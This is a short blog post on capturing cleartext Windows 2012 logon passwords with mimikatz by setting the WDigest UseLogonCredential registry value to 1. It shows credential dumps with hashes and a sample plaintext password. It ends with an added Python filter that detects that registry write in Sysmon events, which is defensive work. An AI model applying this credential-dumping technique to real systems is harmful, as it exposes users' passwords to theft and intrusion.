How to capture cleartext passwords on Windows 2012
2016-04-12 14:31
With the default configuration, cleartext passwords can no longer be captured; the indispensable tool mimikatz shows Password as null:
Authentication Id : 0 ; 121279 (00000000:0001d9bf)
Session           : Interactive from 1
User Name         : mickey
Domain            : WIN-B054LAOH5FC
Logon Server      : WIN-B054LAOH5FC
Logon Time        : 2014/2/7 16:13:37
SID               : S-1-5-21-3697557613-2315859964-140861748-1001
        msv :
         [00000003] Primary
         * Username : mickey
         * Domain   : WIN-B054LAOH5FC
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
         [00010000] CredentialKeys
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
        tspkg :
        wdigest :
         * Username : mickey
         * Domain   : WIN-B054LAOH5FC
         * Password : (null)
        kerberos :
         * Username : mickey
         * Domain   : WIN-B054LAOH5FC
         * Password : (null)
        ssp : KO
        credman :
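For the password to appear, the "UseLogonCredential" value under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest must be set to 1, with type DWORD (32-bit). The next time the user logs on, the cleartext password is recorded: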
Authentication Id : 0 ; 2506062 (00000000:00263d4e)
Session           : Interactive from 2
User Name         : mickey
Domain            : WIN-B054LAOH5FC
Logon Server      : WIN-B054LAOH5FC
Logon Time        : 2015/5/11 11:47:35
SID               : S-1-5-21-3697557613-2315859964-140861748-1001
        msv :
         [00010000] CredentialKeys
         * NTLM     : ad12521316a18d2172f20db07674c278
         * SHA1     : 85b6b322a966fe19f758ee15fd7516c23c33cb7c
         [00000003] Primary
         * Username : mickey
         * Domain   : WIN-B054LAOH5FC
         * NTLM     : ad12521316a18d2172f20db07674c278
         * SHA1     : 85b6b322a966fe19f758ee15fd7516c23c33cb7c
        tspkg :
        wdigest :
         * Username : mickey
         * Domain   : WIN-B054LAOH5FC
         * Password : AGeisNBVeryNB@wooyun.org
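A defender's view of the registry change described above, as an added example that is not part of the original post: a Python filter over Sysmon Event ID 13 (registry value set) records that flags writes setting UseLogonCredential to 1. The sample events, host paths and timestamps are constructed, and the "Field: value" record layout is an assumption about how the events were exported.

```python
import re

# Registry value named on this page. Sysmon writes the hive as "HKLM\System\..."
# and may report CurrentControlSet or a numbered ControlSetNNN.
TARGET = re.compile(
    r"^HKLM\\SYSTEM\\(CurrentControlSet|ControlSet\d{3})\\Control"
    r"\\SecurityProviders\\WDigest\\UseLogonCredential$", re.IGNORECASE)
DWORD = re.compile(r"^DWORD \((0x[0-9a-fA-F]+)\)$")

# Constructed sample events (not from the page), in an assumed "Field: value"
# export of Sysmon Event ID 13 messages, one blank line between records.
SAMPLE_EVENTS = r"""
UtcTime: 2015-05-11 03:40:02.113
Image: C:\Windows\System32\reg.exe
TargetObject: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential
Details: DWORD (0x00000001)

UtcTime: 2015-05-11 03:41:10.900
Image: C:\Windows\System32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\Negotiate
Details: DWORD (0x00000000)

UtcTime: 2015-05-11 03:45:30.007
Image: C:\Windows\regedit.exe
TargetObject: HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\UseLogonCredential
Details: DWORD (0x00000000)
"""

def parse_events(text):
    """Split blank-line separated records into dicts of field -> value."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = dict(l.split(": ", 1) for l in block.splitlines() if ": " in l)
        if fields:
            events.append(fields)
    return events

def wdigest_enabled_events(events):
    """Return the events that set UseLogonCredential to DWORD 1."""
    hits = []
    for ev in events:
        value = DWORD.match(ev.get("Details", "").strip())
        on_target = TARGET.match(ev.get("TargetObject", "").strip())
        if on_target and value and int(value.group(1), 16) == 1:
            hits.append(ev)
    return hits

if __name__ == "__main__":
    for ev in wdigest_enabled_events(parse_events(SAMPLE_EVENTS)):
        print(ev["UtcTime"], ev["Image"], "set UseLogonCredential to 1")
```

Writes that set the value back to 0, and writes to other values under the WDigest key, are parsed but not reported.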
Reference: http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html